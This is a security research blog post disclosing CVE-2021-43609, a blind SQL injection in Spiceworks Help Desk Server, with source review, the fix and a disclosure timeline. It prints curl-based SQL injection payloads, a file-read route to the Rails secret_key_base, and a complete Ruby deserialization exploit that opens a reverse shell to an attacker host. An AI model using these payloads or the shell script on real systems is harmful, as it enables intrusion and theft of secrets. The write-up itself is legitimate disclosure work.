Spiceworks – CVE-2021-43609

Flashback Time!

This technical blog post looks at one of the early vulnerabilities uncovered by the Division 5 research program. The team undertook research into the Spiceworks Help Desk application. The following write-up is from the researcher on this vulnerability: Aidan Stansfield.

About Spiceworks Help Desk Server

This application comes in both an on-premises and cloud hosted package. Due to the Spiceworks terms of use, I performed my research upon the on-premises application, so that I was only attacking my own infrastructure and data.

The on-premises application is called Spiceworks Help Desk Server (HDS), and is packaged into an Open Virtual Appliance (OVA) file that can be run with various virtualisation technologies. The main purpose of the application is to facilitate IT support, allowing users to submit ‘tickets’ to the help desk such that an agent can look at the ticket and provide appropriate help to the user.

Exploring inside the OVA file, I located the Spiceworks HDS application and found it to be a Ruby on Rails application. This was great news as it simplified the vulnerability research process since the source code is provided and does not need to be decompiled.

Identifying SQL Injection

While performing source code review, I identified a SQL Injection vulnerability in:

				
					/opt/tron/embedded/service/tron-rails/app/models/reporting/database_query.rb
				
			

The vulnerable function, order_by_for_ticket can be found below (with some irrelevant code removed for the sake of brevity). The purpose of this function is to order a list of tickets based upon a specific column and direction (e.g., order the tickets by the date submitted).

				
					def order_by_for_ticket(order, dir)
    @scope = if order == 'organization'
        order = "lower(organizations.name) #{dir}" # we can inject in 'dir'

        explain('.joins(:organization)')
        @scope.joins(:organization)
    elsif order == 'assignee'
        order = "lower(users.first_name) #{dir}, lower(users.last_name) #{dir}" # we can inject in 'dir'

        explain('.joins("LEFT OUTER JOIN users ON tickets.assignee_id = users.id")')
        @scope.joins('LEFT OUTER JOIN users ON tickets.assignee_id = users.id')
    elsif order == 'creator'
        ... snip ...
    else
        order += " #{dir}" # we can inject in 'dir' OR 'order' since dir is appended to user supplied order
        @scope
    end
    order = Arel.sql(order)
    explain(".order(#{order})")
    @scope = @scope.order(order) # here is the SQLi vuln
end
				
			

Here we see that if the attacker can control the ‘order’ and ‘dir’ parameters to this function, then they can control the SQL that is passed to the ‘@scope.order’ function. This can be abused to perform Blind Boolean SQL injection.

Path from request to vulnerable function

Before delving into the SQL injection, it’s important to first see where and how this function is called.

Checking for references to this function, we see it is called by the order_by function as defined below:

				
					# applies an ordering to the query
# see #normalize_order
def order_by(order_obj)
    return self if order_obj.blank?

    @order = normalize_order(order_obj)
    order = @order.first
    dir = @order.last

    if @initial_scope.klass == Ticket
        order_by_for_ticket(order, dir) # < order_by_for_ticket
    else
        order_param = "#{order} #{dir}"
        explain('.order(%s)', order_param)
        @scope = @scope.order(order_param)
    end

    self
end
				
			

The normalize_order function takes an order object and normalizes it into the format ['sort', 'direction']. It does this by splitting the order objects on spaces or hyphens, which we will keep a note of for later. The order_by function is called from within the index function of the /opt/tron/embedded/service/tron-rails/app/controllers/api/tickets_controller.rb file, which defines the /api/tickets route. This function can be seen below:

				
					def index
    filter_hash = begin
        params[:filter].permit!.to_h
    rescue StandardError
        {}
    end

    if params[:q].present?
        @tickets = Reporting::SearchQuery.new(
            current_user.accessible_tickets_for_search,
            mappings: default_mappings
        ).query(params[:q])
    else
        @tickets = Reporting::DatabaseQuery.new(current_user.accessible_tickets, mappings: default_mappings)
    end

    @tickets.filter(filter_hash)
        .order_by(params[:sort] || {ticket_number: :desc}) # < order_by is called here
    ... snip ...

    render json: @tickets, each_serializer: TicketsListSerializer
end
				
			

To summarise, the SQL injection can be reached by requesting the /api/tickets endpoint with a sort query string parameter. This will call the order_by function, which normalises the sort query string parameter to extract the column name and direction, before passing them over to the vulnerable order_by_for_ticket function. This means that any agent or admin user is able to execute this SQL injection.

Executing SQL Injection

By adding some debug statements into the source code, it was possible to identify the underlying SQL query that is run. Requesting the /api/tickets?sort=order+direction+junk endpoint, we see the following SQL statement is made:

				
					SELECT "tickets".* FROM "tickets" INNER JOIN "organizations" ON "tickets"."organization_id" = "organizations"."id" WHERE "tickets"."type" IN ('Ticket') AND "organizations"."account_id" = $1 AND (tickets.assignee_id = 3 OR tickets.creator_id = 3 OR tickets.id in (NULL)) ORDER BY order direction LIMIT $2 OFFSET $3

				
			

Note that ‘junk’ does not appear anywhere within the SQL statement. This is because the normalize_order function splits the sort query string parameter based upon spaces or hyphens, and assigns the first two items to the order and direction respectively. Therefore, we cannot use spaces or hyphens in our payload. To get around this, we can replace spaces with SQL comments (e.g., /**/). Requesting /api/tickets?sort=order/**/direction/**/junk results in the following SQL statement:

				
					SELECT "tickets".* FROM "tickets" INNER JOIN "organizations" ON "tickets"."organization_id" = "organizations"."id" WHERE "tickets"."type" IN ('Ticket') AND "organizations"."account_id" = $1 AND (tickets.assignee_id = 3 OR tickets.creator_id = 3 OR tickets.id in (NULL)) ORDER BY order/**/direction/**/junk asc LIMIT $2 OFFSET $3

				
			

Notice that ‘junk’ now appears within the payload, and a default direction of ‘asc’ is assigned since our payload did not contain any spaces or hyphens. Since we only control the ORDER BY parameter, we cannot simply leak arbitrary database results directly into the page. However, as alluded to earlier, we can achieve Blind Boolean based injection to leak arbitrary data. Consider the following SQL statement:

				
					SELECT x FROM y WHERE z ORDER BY (SELECT CASE WHEN ($condition) THEN 1 ELSE 1/(SELECT 0) END) asc

				
			

When $condition is true, the select case statement will return 1, and so the results will be ordered by the 1st column. When $condition is false however, the select case statement will return 1/(SELECT 0), which will cause a division by zero error within the database and cause the application to return a 500 internal server error.

For example, setting the condition to 1=1 will return true, and a 200 response code:

				
					$ curl "https://$IP/api/tickets?sort=(SELECT/**/CASE/**/WHEN/**/(1=1)/**/THEN/**/1/**/ELSE/**/1/(SELECT/**/0)/**/END)" -H "Cookie: $COOKIES" -k --head -s | head -n1
HTTP/1.1 200 OK
				
			

Whereas setting the condition to 1=2 will return false, and a 500 response code:

				
					$ curl "https://$IP/api/tickets?sort=(SELECT/**/CASE/**/WHEN/**/(1=2)/**/THEN/**/1/**/ELSE/**/1/(SELECT/**/0)/**/END)" -H "Cookie: $COOKIES" -k --head -s | head -n1
HTTP/1.1 500 Internal Server Error
				
			

Escalating to RCE

Since the database user possesses ‘super’ privileges, this SQL injection can be used to read arbitrary local files with the pg_read_file PostgreSQL command. A particular file of interest is the environment configuration file, which details all of the environment variables and secrets used by the Rails application. This file can be found at the following location: /var/opt/tron/etc/env.

Included in this configuration is the secret_key_base, which is a secret used to sign all serialized cookies. Once the secret_key_base is leaked from the environment configuration, an attacker can send specially crafted requests and gain remote code execution through deserialization of signed malicious data.

The ability to force a Rails application to deserialize arbitrary code after the disclosure of the secret_key_base is considered part of the intended internal functionalities of Rails applications and is not a separate vulnerability within the Spiceworks codebase. For technical discussion of this technique and why it is considered an intended internal functionality, see the below disclosure:

Extending upon the information provided within that report, the following payload can be used to send a reverse shell to back to an attacker once the secret_base_key is known. 

				
					#!/usr/bin/env ruby
require "base64"
require "erb"
require "./config/environment"
require 'uri'
require 'net/http'

base_url = "https://<rhost>/rails/active_storage/disk/" # update with victim location

secret_key_base = "<secret_key_base>" # update with leaked secret_key_base
key_generator = ActiveSupport::CachingKeyGenerator.new(ActiveSupport::KeyGenerator.new(secret_key_base, iterations: 1000))
secret = key_generator.generate_key("ActiveStorage")
verifier = ActiveSupport::MessageVerifier.new(secret)
code = '`/bin/bash -c "/bin/bash -i &> /dev/tcp/<lhost>/<lport> 0>&1"`' # update with attacker's IP and PORT
erb = ERB.allocate
erb.instance_variable_set :@src, code
erb.instance_variable_set :@filename, "1"
erb.instance_variable_set :@lineno, 1
dump_target  = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new erb, :result
payload = verifier.generate(dump_target, purpose: :blob_key)

vuln_url = base_url + payload + '/doesnotexist'
uri = URI(vuln_url)
req = Net::HTTP::Get.new(uri.path)
res = Net::HTTP.start(
                uri.host, uri.port,
                :use_ssl => uri.scheme == 'https',
                :verify_mode => OpenSSL::SSL::VERIFY_NONE) do |https|
    https.request(req)
end</lport></lhost></secret_key_base></rhost>
				
			

The Fix

The order_by_for_ticket function has been patched in Spiceworks HDS version 1.3.3 by enforcing the ‘order’ and ‘dir’ parameters to be one of various set options, as can be seen below:

				
					def order_by_for_ticket(order, dir)
    dir = dir == 'desc' ? 'desc' : 'asc' # 'dir' can only be desc or asc
    @scope = case order
        when 'organization'
            order = "lower(organizations.name) #{dir}" # 'dir' can only be desc or asc

            explain('.joins(:organization)')
            @scope.joins(:organization)
        ... snip ...
        when 'updated_at'
            order = "updated_at #{dir}" # 'dir' can only be desc or asc
            @scope
        else
            order = "id #{dir}" # 'dir' can only be desc or asc, and order is hardcoded to 'id'
            @scope
        end
    order = Arel.sql(order)
    explain(".order(#{order})")
    @scope = @scope.order(order) # 'order' and 'dir'
end
				
			

Summary

CVE-2021-43609 allows an authorized remote attacker to exploit a Blind Boolean SQL injection to read arbitrary data and files, leading to RCE through deserialization techniques inherent to Ruby on Rails. Spiceworks HDS versions < 1.3.3 are vulnerable. A proof of concept (POC) exploit can be found at https://github.com/d5sec/CVE-2021-43609-POC. An example of the entire exploit chain can be found below:

Disclosure Timeline

  • 02/09/2021 – Vulnerability identified
  • 08/09/2021 – Initial reach out to Spiceworks Ziff Davis
  • 10/09/2021 – 22/09/2021 – Subsequent attempts to contact Spiceworks Ziff Davis
  • 23/09/2021 – Spiceworks Ziff Davis first response
  • 23/09/2021 – Vulnerability is reported
  • 30/10/2021 – Spiceworks Ziff Davis advises the vulnerability has been remediated
  • 13/11/2021 – CVE-2021-43609 is assigned

Support From Division 5

At Division 5, our research program consistently identifies critical vulnerabilities like this SQL injection in Spiceworks. This specialised program finds issues before malicious actors can exploit them. The research program includes:

  • Vulnerability Research & Discovery: Our researchers proactively identify complex vulnerabilities in applications, hardware, appliances, infrastructure, and more.
  • Proof of Concept Development: We develop working exploits to validate vulnerabilities and demonstrate real-world impact, ensuring you understand the true risk to your systems.
  • Custom Application Security Research: Commission targeted research against your specific technology stack to identify vulnerabilities before attackers do.

We don’t just discover vulnerabilities—we provide detailed technical analysis and actionable remediation advice.

Chat to us about accessing our security research program and ensure your organisation benefits from cutting-edge vulnerability research tailored to your technology.